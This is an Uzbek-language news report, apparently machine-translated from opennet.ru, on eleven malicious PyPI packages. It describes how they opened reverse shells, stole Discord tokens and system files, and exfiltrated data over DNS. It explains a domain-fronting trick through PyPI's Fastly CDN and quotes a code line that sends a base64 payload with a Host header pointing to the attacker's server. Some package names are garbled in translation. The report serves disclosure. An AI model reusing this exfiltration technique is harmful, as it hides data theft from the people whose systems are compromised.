PyPI (Python Package Index) katalogida zararli kodni o'z ichiga olgan 11 ta paket aniqlangan. Muammolar aniqlanmaguncha paketlar jami 38 ming marta yuklab olingan. Aniqlangan zararli paketlar tajovuzkorlar serverlari bilan aloqa kanallarini yashirishning murakkab usullaridan foydalanishi bilan ajralib turadi.
- muhim paket (6305 ta yuklangan), muhim paket (12897) - tizimga qobiq kirishini ta'minlash uchun pypi.python.org ga ulanish niqobi ostida tashqi serverga ulanish o'rnatildi (teskari qobiq) va trevorc2 dasturidan yashirish uchun foydalanildi. aloqa kanali.
- pptest (10001), ipboards (946) - tizim haqidagi ma'lumotlarni uzatish uchun DNS-dan aloqa kanali sifatida foydalanilgan (birinchi paketda xost nomi, ishchi katalog, ichki va tashqi IP, ikkinchisida - foydalanuvchi nomi va xost nomi) .
- owlmoon (3285), DiscordSafety (557), yiffparty (1859) - tizimda Discord xizmat tokenini aniqladi va uni tashqi xostga yubordi.
- trrfab (287) - tashqi xostga /etc/passwd, /etc/hosts, /home identifikatorini, xost nomini va mazmunini yubordi.
- 10Cent10 (490) - tashqi xost bilan teskari qobiq aloqasi o'rnatildi.
- yandex-yt (4183) - tizim buzilganligi va nda.ya.ru (api.ya.cc) orqali keyingi harakatlar haqida qo'shimcha ma'lumotga ega bo'lgan sahifaga yo'naltirilganligi haqidagi xabarni ko'rsatdi.
Muhim paketlar va muhim paketlar paketlarida ishlatiladigan tashqi xostlarga kirish usuli alohida e'tiborga loyiqdir, ular faolligini yashirish uchun PyPI katalogida ishlatiladigan Fastly kontentni yetkazib berish tarmog'idan foydalanganlar. Aslida, so'rovlar pypi.python.org serveriga yuborilgan (shu jumladan HTTPS so'rovi ichida SNI-da python.org nomini ko'rsatish), ammo HTTP "Xost" sarlavhasi tajovuzkorlar tomonidan boshqariladigan server nomini o'z ichiga olgan (sek. forward.io. global.prod.fastly.net). Kontentni etkazib berish tarmog'i ma'lumotlarni uzatishda pypi.python.org ga TLS ulanish parametrlaridan foydalangan holda hujum qiluvchi serverga xuddi shunday so'rov yubordi.
PyPI infratuzilmasi Fastly kontent yetkazib berish tarmog‘i tomonidan quvvatlanadi, u odatiy so‘rovlarni keshlash uchun Varnish shaffof proksi-serveridan foydalanadi, shuningdek, HTTPS so‘rovlarini proksi-server orqali yuborish uchun oxirgi serverlarda emas, CDN darajasida TLS sertifikatini qayta ishlashdan foydalanadi. Maqsadli xostdan qat'i nazar, so'rovlar HTTP "Xost" sarlavhasi yordamida kerakli xostni aniqlaydigan proksi-serverga yuboriladi va xost domen nomlari barcha Fastly mijozlari uchun odatiy bo'lgan CDN yuk muvozanatlashtiruvchi IP manzillariga bog'lanadi.
Buzg'unchilar serveri CDN Fastly bilan ham ro'yxatdan o'tadi, bu esa hamma uchun bepul rejalarni taqdim etadi va hatto anonim ro'yxatga olish imkonini beradi. Shunisi e'tiborga loyiqki, "teskari qobiq" ni yaratishda jabrlanuvchiga so'rov yuborish uchun sxema ham qo'llaniladi, ammo tajovuzkor uy egasi tomonidan boshlanadi. Tashqi tomondan, tajovuzkorlar serveri bilan o'zaro aloqa PyPI TLS sertifikati yordamida shifrlangan PyPI katalogi bilan qonuniy seansga o'xshaydi. "Domenga kirish" deb nomlanuvchi shunga o'xshash usul ilgari bloklashni chetlab o'tishda xost nomini yashirish uchun faol foydalanilgan, ba'zi CDN tarmoqlarida SNI-da xayoliy xostni ko'rsatish va aslida nomini uzatish orqali HTTPS-ga kirish imkoniyatidan foydalangan holda. TLS seansi ichidagi HTTP Xost sarlavhasida so'ralgan xost.
Zararli harakatni yashirish uchun TrevorC2 to'plami qo'shimcha ravishda oddiy veb-navigatsiyaga o'xshash server bilan o'zaro aloqani o'rnatish uchun ishlatilgan, masalan, "https://pypi.python.org/images/" rasmini yuklab olish niqobi ostida zararli so'rovlar yuborilgan. guid =" guid parametrida ma'lumotlarni kodlash bilan. url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload r = request.Request(url, sarlavhalar = {'Host': "psec.forward.io.global.prod.fastly.net"})
Pptest va ipboards paketlari DNS serveriga so'rovlarda foydali ma'lumotlarni kodlash asosida tarmoq faolligini yashirish uchun boshqa yondashuvdan foydalangan. Zararli dastur ma'lumotni "nu4timjagq4fimbuhe.example.com" kabi DNS so'rovlarini bajarish orqali uzatadi, bunda boshqaruv serveriga uzatiladigan ma'lumotlar subdomen nomidagi base64 formati yordamida kodlanadi. Tajovuzkor bu xabarlarni example.com domeni uchun DNS serverini boshqarish orqali oladi.
Manba: opennet.ru